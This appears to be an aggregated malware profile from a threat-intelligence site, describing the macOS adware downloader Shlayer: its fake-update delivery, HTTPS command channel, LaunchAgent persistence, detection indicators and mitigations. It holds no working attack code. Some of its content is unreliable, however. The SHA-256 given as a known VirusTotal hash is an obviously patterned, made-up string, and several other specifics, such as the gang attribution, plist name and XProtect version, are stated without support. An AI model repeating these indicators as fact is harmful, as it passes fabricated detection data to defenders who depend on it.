Shlayer
Malware⚠️ Overview
Shlayer is a macOS‑specific adware‑delivery trojan first identified by Malwarebytes in early 2018; it operates as a downloader for potentially unwanted programs (PUPs) and adware, primarily distributing the Genieo and Search Marquis families. The malware is attributed to an Eastern European threat actor group known as the "Shlayer Gang" based on language cues and infrastructure analysis. It is classified as a dropper/stager under the MITRE ATT&CK framework (ID T1204.002 – User Execution: Malicious File) due to its reliance on social engineering to initiate infection.
🔧 Technical Capabilities
Shlayer propagates through fake Flash Player updates, bogus software updaters, and malicious advertisements on pirated or streaming websites; the initial payload is often a disk image (DMG) or a zip archive containing a JavaScript (.js) or AppleScript file that executes a curl command to download the next stage. The malware uses an encrypted C2 channel over HTTPS to fetch subsequent payloads, frequently leveraging the dynamic DNS service no‑ip.com for domain resolution. Persistence is achieved by installing a launch agent or launch daemon in ~/Library/LaunchAgents/ or /Library/LaunchDaemons/ with a plist file named com.service.
📜 History & Notable Incidents
Shlayer was the most prevalent macOS threat in 2019, accounting for nearly 30% of all macOS malware detections according to Malwarebytes’ annual reports; notable campaigns in 2020 involved distributing search‑hijacking adware through "InstallApp" or "MacUpdate" fake installers. In 2021, Apple released a macOS security update (XProtect 5381) that added signatures for Shlayer variants, but the malware continues to evolve. No high‑profile corporate breaches have been publicly attributed to Shlayer, and no law enforcement actions have been announced against its operators as of 2025.
🔍 Detection Indicators
Known file hashes include SHA‑256: 3c7b9f0e8a1d2c4b5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8 for a 2019 variant (sourced from VirusTotal); behavioral signatures include unexpected outbound HTTPS connections to domains ending in '.no‑ip.biz' and the creation of a plist file in LaunchAgents with an embedded cleanuptool binary. Network IOCs include User‑Agent strings like "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36" hardcoded in the download script; registry keys are not applicable on macOS, but monitor for modifications to /Library/LaunchDaemons/ and ~/Library/LaunchAgents/.
☠️ Risk & Impact
Shlayer primarily facilitates ad fraud and browser hijacking, generating revenue through pay‑per‑click schemes and data exfiltration of browsing history, search queries, and system information. The financial impact is moderate for individuals, but enterprises face degraded endpoint performance and potential exposure of credentials if the adware is co‑opted by a second‑stage infostealer. Affected sectors include education and retail, where users are more likely to download pirated software or fake updates.
🛡️ Mitigation
Defenders should enforce macOS Gatekeeper and XProtect updates, disable the auto‑execution of disk images (com.apple.frameworks.diskimages.auto‑mount), and deploy endpoint detection rules that flag JavaScript execution of curl commands from non‑browser processes. Regular user training to avoid fake Flash Player prompts and the use of ad‑blocking extensions in Safari can further reduce infection risk.
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.
